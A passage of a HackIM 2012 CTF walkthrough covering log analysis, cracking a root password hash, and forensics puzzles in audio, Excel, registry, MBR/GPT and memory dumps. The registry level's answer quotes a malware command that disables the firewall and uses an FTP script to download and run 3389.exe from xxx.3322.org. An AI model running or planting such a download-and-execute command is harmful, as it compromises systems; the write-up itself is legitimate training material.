look for CVE in such a huge log, used cat command but that didn’t help, again tried with few
more of them but there was no result, eventually ended up with the string command to get the
CVE;

Also found the paper at http://www.exploit-db.com/exploits/9479/ .Finally got my first flag for
the challenge: Tavis Ormandy Julien Tinnes. I studied the exploit and came to understand from
the title that it was local root exploit.
Now expectations were high with strings command and I extracted all the strings from the dump
to a plain text file.The command I used was:
strings dump.pcapng > dump.txt
By this time I had a stripped version of the log with with more important things.
Next I tried to look for the last flag that was for the root password. Since it was a local root
exploit. I looked for the pattern root inside dump.txt and got the hash for the root.

Next I used JohnTheRipper to crack the hash and got my 2nd flag as : zuzana
Onto the hunt for 3rd flag, it asked to look for the vulnerable parameter.Opened dump.txt and saw
that there were many 404 , so again it was time to eliminate those and consider the successful
responses.i tried with few variations and again stripped down dump.txt to ok.txt now we had
much smaller information to analyze.

Went through the file ok.txt and observed and got to noticed that the parameters page, title and id
was common with the entire GET request. Hence with variation of parameters, I got the flag
successfully, I had to spend too much time with all those iterations and variations, indeed it was
one of the level on which I had spent much more time to analyze to get the flag.
Flag:

=====================================================================

Forensics Levels

Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno

Official Hint:

Page Source:

Description:While conducting the raid on a suspect the police found the system containing no
suspicious information in the form of a code. While comparing various files they came up with a
suspicious sound file and feel that the code is hidden inside the same.You are asked to find out
that code if hidden in the file.

Analysis: This was one of the coolest challenge in the HackIM 2012 CTF. I listened to the audio
and observed that there was distortion at certain places and also heard that the distortion
appeared on single channel. I had earlier used audio editor software “GoldWave”. I opened that
audio in GoldWave and separated those distortions from the main stream, since the distortion
was on single channel (right) the task became easier. After listening to the distortion it didn’t
gave up any meaning, and thought of applying some sound effect, on the very first attempt
applying the reverse sound effect I got the flag.

Flag: 12344346765

Forensics Level 2: Andar Ch0r

Official Hint: A night with MS Office

Page Source :

Description: company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the
internal codes secretly outside the organization. The company sniffed the data being sent and
reconstructed it to find that a word document was being sent. The company strongly suspects that
there is some hidden passport code in the document. You as a forensic investigator are provided
with the copy of that file and are required to find out the hidden code. The code has to be in
whole number.

Analysis: This challenge was full of twist, I enjoyed solving it. I opened the given word
document and saw some numeric digits; it was some hex values, I converted them into ASCII
and was made fool. After a while I doubt about the file and tried to confirm it using TrID :
http://mark0.net/onlinetrid.aspx, The result showed up with possibility of the file being an excel
document. I renamed the file into flag.xls and opened it in excel. Cool I was on right path, now I
had no idea of what to do.Next I opened the file in notepad and went through the lines,

somewhere near the end I saw some plain text “Hey Good Job done…..” and just below there
was “Sheet1” and “Sheet2” but I couldn’t remember figuring any Sheet2 in flag.xls. So got an
idea that it was hidden. It had been ages since I had worked on any excel sheet so really had
forgotten how to hide excel sheets. Google, and got a link:
http://www.howtogeek.com/howto/14160/hide-and-unhide-worksheets-and-workbooks-in-excel-
2007-2010/

So now sheet2 was visible, but still I was far away from my flag.Again followed up the link
where it had asked to use VB Editor to unhide the supper hidden worksheet.(ALT+F11).

Saved it, and finally Sheet3 was revealed with the flag in it.

Flag: 6924289

Forensics Level 3: Not Guilty!

Official Hint:

Page Source :

Description: An employee was suspected of using some malicious files. The employee asserts
that he is not guilty because he never used any program except Microsoft word and excel. While
conducting the analysis nothing was found in the registry suggesting that something did run
automatically. All locations that can run program automatically were examined and nothing
malicious was found. You as an investigator are provided with a piece of hive to carve out if
anything was deleted from the hive and provide the exact "Value", "value type" and "data"
deleted so that the employee gets the justice.

Analysis: This level was all about registry recovery. I had never encountered such incident and
to understand it went through several forensics articles of registry recovery. Initially I download
a windows binary of a tool called Yet Another Registry Utility (YARU). Played with it for some
time and realized that it wouldn’t help me to come somewhere around the flag. Quit and went
through few more manuals. Eventually came across a tool called as “reglookup-recover”. It was
an open source, installed on ubuntu and went through the instructions. After this it wasn’t much
tough to get the flag.

Came back to description and cross checked the values obtained with the result, ending up
solving this level.

Flag:
Value:Shell
Value Type:REG_SZ
Data:c:windowssystem32cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org>
cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get
3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del
cmd.txt /q

Forensics Level 4: Intriguing MBR

Official Hint: Sometimes things spill over

Page Source: 

Description: A suspected drive was found in bad shape. The data extraction was almost
impossible and the final copy obtained carried only few bytes. The bytes belonged to the initial
sectors and wherever the system could not read the space was filled with 0x00 so as to keep the
offset of the data obtained intact. The initial sector displayed a messy MBR data.

As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drives
2) The start and end LBA for each partition
3) The Start and end of unpartitioned space between two clusters

The Drive showed to be a SATA drive with 512 bytes of LBA

Analysis: Yet another level that kept me away from doing anything. Merely a 20KB file but may
require 20 hours to understand it for a newbie like me. Started with the google on partition
forensics and ended up with GUID partition table on wikipedia, a long story probably would
speak about it sometime later (Evil Mind).
So the first thing that we required for this challenge was some boot record parsers. I got one at
http://www.garykessler.net/software/index.html. The package contained 5 Perl scripts, extracted
it to a folder.
1. I parsed a GUID Partition Table (GPT) header file image.dd using GPTparser.pl

Result of parsing:

2. Coming back to wikipedia, there was a header format for LBA1:

3. So comparing the offset 072-079 from image.dd with the one on the table below, we can
conclude that there are 9 partitions,( 2 primary copies as mentioned, and 7 between 72-
79)

4. Also it had been mentioned in the description that the LBA size was 512 bytes. And in
our image.dd we can observe from the result of parsing that the partition table is starting
from the offset 80. Hence the next LBA will be at (512+80)=592
5. Now it was time for some hex editing, I opened image.dd and traversed to position
592(250h). Since we had concluded in our earlier steps that there were 9 partitions. We
had to edit the location from 00 to 09

6. Now again we had to parse the modified image.dd.
7. As in Step1 and we got all our 9 partitions.

8. Now next step was to observer the GUID from the result and match it with the table
given on wikipedia to find out the partition type.

9. Finally the LBA thus obtained was not arranged accordingly and we had to arrange it in
ascending order so as to obtain the flag.

Flag:

Forensics Level 5: Universal Swindlers Bayonet

Official Hint:

Page Source :

Description: Anusandhaanic Daakus Ltd. Is a company whose strength lies in the researches it
conducts? Very often the employees leaving the organisation manage to carry the research data
alongwith. This time company decided to go for the investigation and called upon a forensic
investigator. This investigator captured the memory dump and shut the system down. On
resuming the system he finds that the drive has been encrypted and is left with only the memory
dump.
You as an investigator are required to find out the following information from the dump
1) Serial No. of external drive
2) Date and time (IST) when the drive was first connected
3) Date and time (IST) when the drive was last connected
4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exe

Analysis: This level was all about memory dump investigation.As usual had to lookup in google
to find some memory dump analysis tool. Came across Memoryze and Audit Viewer.I installed it
and fired up Audit Viewer to analyze the dump. The GUI was easy to understand and had a
wizard which I followed up accordingly. After a while I got the results in a simple formatted
way. I tried going through the windows but couldn’t find anything much relevant and ended up
getting only the last flag.

Again went through the various links and came across a tool named volatility. Installed it and
played with it for a while.With the following working steps I got the rest flags:
1. I tried to locate the registry hive where we could find the external drive information.

2. The second last registry hive was supposed to store all the drive information.
3. I dumped the second last hive and got a very long list of registry information.
4. The challenge was to look for the external drive information I went through few analysis
articles and found that USBSTOR key stores the external USB drive information.
5. Hence ended up with the following command and got the result successfully.

6. But still the flag was not yet completed the page source revealed that the expect time
must be in IST hence we had to add +5:30 to the time when drive was first connected and
last disconnected.

Flag:

Finally Near The End, Few Words:
- All the links and tools mentioned above were functioning during this write-up and I
cannot assume it to be working throughout.
- I apologize for any grammatical mistakes or with my poor English.
- The ideas mentioned above are my own and may differ from yours.
- I completely agree with the fact that there can be much better way to solve the above
challenges but eventually mine ideas worked out.
- Wish Happy Hacking to Everyone.
- End, Regards To All The Members of NULL.

The epic story ends here…..

~$-THE END-$~

HackIM 2012 CTF Walkthrough

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Similar to HackIM 2012 CTF Walkthrough

Similar to HackIM 2012 CTF Walkthrough (20)

Recently uploaded

Recently uploaded (20)

HackIM 2012 CTF Walkthrough